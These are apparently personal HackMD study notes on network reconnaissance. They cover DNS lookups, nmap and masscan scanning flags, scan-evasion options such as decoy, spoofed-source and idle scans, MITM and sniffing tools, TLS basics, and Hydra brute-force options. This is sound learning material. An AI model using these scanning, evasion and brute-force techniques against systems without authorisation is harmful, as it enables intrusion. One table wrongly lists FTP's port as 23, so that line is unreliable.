Try   HackMD

Network Security 101

tags: cyber security network security recon nmap

Passive Recon

We use:

  • whois to query WHOIS servers
  • nslookup to query DNS servers
  • dig to query DNS servers
  • DNSDumpster
  • Shodan.io

These are all publicly available records and hence do not alert the target.
Passive recon relies on publicly available knowledge which can be accessed without directly interacting with the target.

Whois

WHOIS is a request and response protocol that follows the RFC 3912 specification. A WHOIS server listens on TCP port 43 for incoming requests. The domain registrar is responsible for maintaining the WHOIS records for the domain names it is leasing. The WHOIS server replies with:

  • Registrar: Via which registrar was the domain name registered?
  • Contact info of registrant: Name, organization, address, phone, among other things. (unless made hidden via a privacy service)
  • Creation, update, and expiration dates: When was the domain name first registered? When was it last updated? And when does it need to be renewed?
  • Name Server: Which server to ask to resolve the domain name?

nslookup vs dig

You can use nslookup OPTIONS DOMAIN_NAME SERVER
These three main parameters are:

  • OPTIONS contains the query type as shown in the table below. e.g A for IPv4 addresses and AAAA for IPv6 addresses.
  • DOMAIN_NAME is the domain name you are looking up.
  • SERVER is the DNS server that you want to query. You can choose any local or public DNS server to query. Cloudflare offers 1.1.1.1 and 1.0.0.1, Google offers 8.8.8.8 and 8.8.4.4, and Quad9 offers 9.9.9.9 and 149.112.112.112. You can opt for others as well.
Query Result
A IPv4 Addresses
AAAA IPv6 Addresses
CNAME Canonical Name
MX Mail Servers
SOA Start of Authority
TXT TXT Records

Dig provides more details than nslookup and its syntax is as shown below

dig tryhackme.com MX

# If you want to query a 1.1.1.1 DNS server, you can execute:
dig @1.1.1.1 tryhackme.com MX.

dnsdumpster

Great goto at dnsdumpster

Shodan

Great goto at shodan.io

Active Recon

Telnet

  • Developed in 1969 to communicate with a remote system via CLI. Uses the telnet protocol for remote administration.
  • telnet sends all the data, including usernames and passwords, in cleartext.
  • Sending in cleartext makes it easy for anyone, who has access to the communication channel, to steal the login credentials.
  • The secure alternative is SSH (Secure SHell) protocol.






telnet [ip] [port]

GET / HTTP/1.1
host:telnet

# press enter twice

nmap

Here is a link to the nmap 101 series.

  • You can provide a file as input for your list of targets, nmap -iL list_of_hosts.txt.
  • To check the list of hosts that Nmap will scan, use nmap -sL TARGETS, use the -n flag to disable dns resolution.
  • ARP has one purpose: sending a frame to the broadcast address on the network segment and asking the computer with a specific IP address to respond by providing its MAC (hardware) address.
  • If you want to ping a system on the same subnet, an ARP query should precede the ICMP Echo.
  • Although TCP and UDP are transport layers, for network scanning purposes, a scanner can send a specially-crafted packet to common TCP or UDP ports to check whether the target will respond. This method is efficient, especially when ICMP Echo is blocked.

When no host discovery options are provided, Nmap follows the following approaches to discover live hosts:

  1. When a privileged user tries to scan targets on a local network (Ethernet), Nmap uses ARP requests. A privileged user is root or a user who belongs to sudoers and can run sudo.
  2. When a privileged user tries to scan targets outside the local network, Nmap uses ICMP echo requests, TCP ACK (Acknowledge) to port 80, TCP SYN (Synchronize) to port 443, and ICMP timestamp request.
  3. When an unprivileged user tries to scan targets outside the local network, Nmap resorts to a TCP 3-way handshake by sending SYN packets to ports 80 and 443.

To use Nmap to discover online hosts without port-scanning the live systems, you can issue nmap -sn TARGETS

  • ARP scan is possible only if you are on the same subnet as the target systems.
  • On an Ethernet (802.3) and WiFi (802.11), you need to know the MAC address of any system before you can communicate with it.
  • The MAC address is necessary for the link-layer header; the header contains the source MAC address and the destination MAC address among other fields.
  • To get the MAC address, the OS sends an ARP query. A host that replies to ARP queries is up. The ARP query only works if the target is on the same subnet as yourself, i.e., on the same Ethernet/WiFi.
  • To perform an ARP scan without port-scanning, you can use nmap -PR -sn TARGETS, where -PR indicates that you only want an ARP scan.
  • To scan for alive hosts on the subnet using ICMP use nmap -PE -sn MACHINE_IP/24. This scan will send ICMP echo packets to every IP address on the subnet.
  • Because ICMP echo requests tend to be blocked, consider using ICMP Timestamp or ICMP Address Mask requests to tell if a system is online.
  • Nmap uses timestamp request (ICMP Type 13) and checks whether it will get a Timestamp reply (ICMP Type 14). The -PP option tells Nmap to use ICMP timestamp requests. nmap -PP -sn MACHINE_IP/24 can be used to discover alive hosts on the target subnet.
  • Nmap uses address mask queries (ICMP Type 17) and checks whether it gets an address mask reply (ICMP Type 18). This scan can be enabled with the option -PM. nmap -PM -sn MACHINE_IP/24
  • To use TCP SYN ping, you can do so via the option -PS followed by the port number, range, list, or a combination of them.

arp-scan

Is a scanner built around ARP queries.
arp-scan --localnet / arp-scan -l sends ARP queries to all valid IP addresses on your local networks.
You can also specify the interface as such: sudo arp-scan -I eth0 -l , this would send ARP queries for all valid IP addresses on the eth0 interface.
Note that the packet capture for arp-scan and nmap -PR -sn yield similar traffic patterns.

Host discovery with TCP and UDP

TCP SYN scan











# To get nmap to use TCP SYN ping, use the flag -PS followed by the port number, range, list, or a combination of them. 

# example: target port 21
nmap -PS21

# example: target ports 21, 22, 23, 24, and 25. 
nmap -PS21-25 

# example:  target three ports 80, 443, and 8080.
nmap -PS80,443,8080

TCP ACK scan



















# requires elevated privileges
# By default, port 80 is used. 
# The syntax is similar to TCP SYN ping.
# -PA should be followed by a port number, range, list, or a combination of them. 

# example: target port 21
nmap -PA21

# example: target ports 21, 22, 23, 24, and 25. 
nmap -PA21-25 

# example:  target three ports 80, 443, and 8080
nmap -PA80,443,8080. 

#If no port is specified, port 80 will be used.

# to discover the online hosts on the target’s subnet
sudo nmap -PA -sn MACHINE_IP/24

UDP ping

Similar to TCP SYN and ACK scans, except that the flag used is -PU

Masscan

Masscan uses a similar approach to discover the available systems. However, to finish its network scan quickly, it is quite aggressive with the rate of packets it generates.








masscan MACHINE_IP/24 -p443

masscan MACHINE_IP/24 -p80,443

masscan MACHINE_IP/24 -p22-25

masscan MACHINE_IP/24 ‐‐top-ports 100

Using Reverse DNS lookup

Use the -R flag to enale this.

Nmap Cheat sheet

Scan type flags
ARP Scan sudo nmap -PR -sn MACHINE_IP/24
ICMP Echo Scan sudo nmap -PE -sn MACHINE_IP/24
ICMP Timestamp Scan sudo nmap -PP -sn MACHINE_IP/24
ICMP Address Mask Scan sudo nmap -PM -sn MACHINE_IP/24
TCP SYN Ping Scan sudo nmap -PS22,80,443 -sn MACHINE_IP/30
TCP ACK Ping Scan sudo nmap -PA22,80,443 -sn MACHINE_IP/30
UDP Ping Scan sudo nmap -PU53,161,162 -sn MACHINE_IP/30
flag purpose
no DNS lookup -n
reverse-DNS lookup for all hosts -R
host discovery only -sn

nmap basic port scans

The TCP header flags are:

  1. URG: Urgent flag indicates that the urgent pointer filed is significant. The urgent pointer indicates that the incoming data is urgent, and that a TCP segment with the URG flag set is processed immediately without consideration of having to wait on previously sent TCP segments.
  2. ACK: Acknowledgement flag indicates that the acknowledgement number is significant. It is used to acknowledge the receipt of a TCP segment.
  3. PSH: Push flag asking TCP to pass the data to the application promptly.
  4. RST: Reset flag is used to reset the connection. Another device, such as a firewall, might send it to tear a TCP connection. This flag is also used when data is sent to a host and there is no service on the receiving end to answer.
  5. SYN: Synchronize flag is used to initiate a TCP 3-way handshake and synchronize sequence numbers with the other host. The sequence number should be set randomly during TCP connection establishment.
  6. FIN: The sender has no more data to send.
Port scan type example command
TCP connect scan nmap -sT ip
TCP syn scan nmap -sS ip
UDP scan nmap -sU ip
flag purpose
-p- all ports
-p1-1023 ports 1 to 1023 inclusive
-F 100 most common ports
-r scan ports in consecutive order
-T<0-5> paranoid(0), sneaky(1), polite(2), normal(3), aggressive(4), insane(5)
–max-rate 50 rate <=50 packets/sec
–min-rate 15 rate >=15 packets/sec
–min-parallelism 100 at least 100 probes in parallel

nmap Advanced port scans

Scan type Command
TCP Null Scan sudo nmap -sN [ip]
TCP FIN Scan sudo nmap -sF [ip]
TCP Xmas Scan sudo nmap -sX [ip]
TCP Maimon Scan sudo nmap -sM [ip]
TCP ACK Scan sudo nmap -sA [ip]
TCP Window Scan sudo nmap -sW [ip]
Custom TCP Scan sudo nmap –scanflags URGACKPSHRSTSYNFIN [ip]
Spoofed Source IP sudo nmap -S SPOOFED_IP [ip]
Spoofed MAC Address –spoof-mac SPOOFED_MAC
Decoy Scan nmap -D DECOY_IP,ME 10.10.96.13
Idle (Zombie) Scan sudo nmap -sI ZOMBIE_IP 10.10.96.13
Fragment IP data into 8 bytes -f
Fragment IP data into 16 bytes -ff
option purpose
–source-port PORT_NUM specify source port number
–data-length NUM append random data to reach given length
–reason explains how Nmap made its conclusion
-v verbose
-vv very verbose
-d debugging
-dd detailed debugging

nmap reports

options meaning
-sV determine service/version info on open ports
-sV –version-light try the most likely probes (2)
-sV –version-all try all available probes (9)
-O detect OS
–traceroute run traceroute to target
–script=SCRIPTS Nmap scripts to run
-sC or –script=default run default scripts
-A equivalent to -sV -O -sC –traceroute
-oN save output in normal format
-oG save output in grepable format
-oX save output in XML format
-oA save output in normal, XML and Grepable formats

script types

script category description
auth Authentication related scripts
broadcast Discover hosts by sending broadcast messages
brute Performs brute-force password auditing against logins
default Default scripts, same as -sC
discovery Retrieve accessible information, such as database tables and DNS names
dos Detects servers vulnerable to Denial of Service (DoS)
exploit Attempts to exploit various vulnerable services
external Checks using a third-party service, such as Geoplugin and Virustotal
fuzzer Launch fuzzing attacks
intrusive Intrusive scripts such as brute-force attacks and exploitation
malware Scans for backdoors
safe Safe scripts that won’t crash the target
version Retrieve service versions
vuln Checks for vulnerabilities or exploit vulnerable services

Protocols and servers

Protocol Tcp port Applications Data security
FTP 21 file transfer clear text
HTTP 80 www clear text
IMAP 143 Email MDA clear text
POP3 110 Email MDA clear text
SMTP 25 Email MTA clear text
Telnet 23 remote access clear text

Servers implementing these protocols are subject to different kinds of attacks. To name a few, consider:

  • Sniffing Attack (Network Packet Capture)
  • Man-in-the-Middle (MITM) Attack
  • Password Attack (Authentication Attack)
  • Vulnerabilities

Sniffing Attack

For Capturing network packets consider:

  1. Tcpdump - a free open source command-line interface (CLI) program that has been ported to work on many operating systems.
  2. Wireshark - a free open source graphical user interface (GUI) program available for several operating systems, including Linux, macOS and MS Windows.
  3. Tshark - a CLI alternative to Wireshark.

MITM

For MITM consider:
Ettercap
Bettercap

  • MITM can also affect other cleartext protocols such as FTP, SMTP, and POP3.
  • Mitigation against this attack requires the use of cryptography.
  • The solution lies in proper authentication along with encryption or signing of the exchanged messages.
  • Transport Layer Security (TLS) protects from MITM attacks with the help of Public Key Infrastructure (PKI) and trusted root certificates.

TLS:

SSL (Secure Sockets Layer) started when the world wide web started to see new applications, such as online shopping and sending payment information.
Netscape introduced SSL in 1994, with SSL 3.0 being released in 1996. But eventually, more security was needed, and TLS (Transport Layer Security) protocol was introduced in 1999.
They fit into the Presentation Layer of the OSI model.
An existing cleartext protocol can be upgraded to use encryption via SSL/TLS.

Protocol default port secured protocol secured port
HTTP 80 HTTPS 443
FTP 23 FTPS 990
SMTP 25 SMTPS 465
POP3 110 POP3S 995
IMAP 143 IMAPS 993
  • Considering the case of HTTP. Initially, to retrieve a web page over HTTP, the web browser would need at least perform the following two steps:
  • Establish a TCP connection with the remote web server
  • Send HTTP requests to the web server, such as GET and POST requests.
  • HTTPS requires an additional step to encrypt the traffic. The new step takes place after establishing a TCP connection and before sending HTTP requests. This extra step can be inferred from the ISO/OSI model in the image presented earlier. Consequently, HTTPS requires at least the following three steps:
    1. Establish a TCP connection
    2. Establish SSL/TLS connection
    3. Send HTTP requests to the webserver

To establish an SSL/TLS connection, the client needs to perform the proper handshake with the server as shown below based on RFC 6101:

Created with RaphaΓ«l 2.2.0clientclientserverserverClientHello ServerHelloCertificate, ServerKeyExchange  CertificateRequest , Server Hello doneCertificateClientKeyExchange  Certificate Verify, [ChangeCipherSpec] Finished[ChangeCipherSpec] Finished

Hydra

Option Explanation
-l [username] username
-P [path] path to wordlist
server service set server address and service to attack
-s [port] use in case of non-default service port #
-v or -vv show username and password attempts
-d display debugging output
Last changed by 
 
codeAssassin
As a code Assassin my focus is on Learning different ways to break code, and therefore, secure it. Interested in everything cyber security!
4
319

Read more

Jeeves - HTB Series

Windows Exploitation Walk through for Jeeves on Hack The Box

Sep 5, 2024
Windows Privilege Escalation

Fuzzy Security reference

Aug 26, 2024
Chatterbox - HTB Series

We start by scanning the target with nmap to find open ports

Aug 11, 2024
Active - HTB Series

image

Aug 10, 2024
Read more from codeAssassin
Published on HackMD